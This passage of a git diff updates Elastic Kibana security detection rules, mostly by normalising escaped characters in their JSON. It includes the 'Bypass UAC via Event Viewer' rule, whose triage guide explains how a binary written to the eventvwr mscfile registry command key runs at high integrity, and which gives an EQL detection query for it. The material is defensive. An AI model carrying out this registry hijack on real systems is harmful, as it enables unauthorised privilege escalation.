@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json
index 63c00776ecb..aea5d917d2c 100644
--- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json
index b627c2ca9b6..1ad7e49f627 100644
--- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json
index 1f18c79dd2b..a247d546f5c 100644
--- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json
index e2674d5ce92..247240f54fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json
@@ -34,7 +34,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json
index 182ea8871aa..49f5317802e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json
index 26e3c08f73b..367781ada6a 100644
--- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json
@@ -37,7 +37,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json
index 7b814561d70..131fa23f192 100644
--- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json
index fc14192674a..42baeca35be 100644
--- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json
index 710f6976614..9fdd24e2467 100644
--- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json
index 111407f5946..729668ba3c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json
index 17441ee5a2b..6ea1613585c 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json
index 0d968a71425..515ded88fc0 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
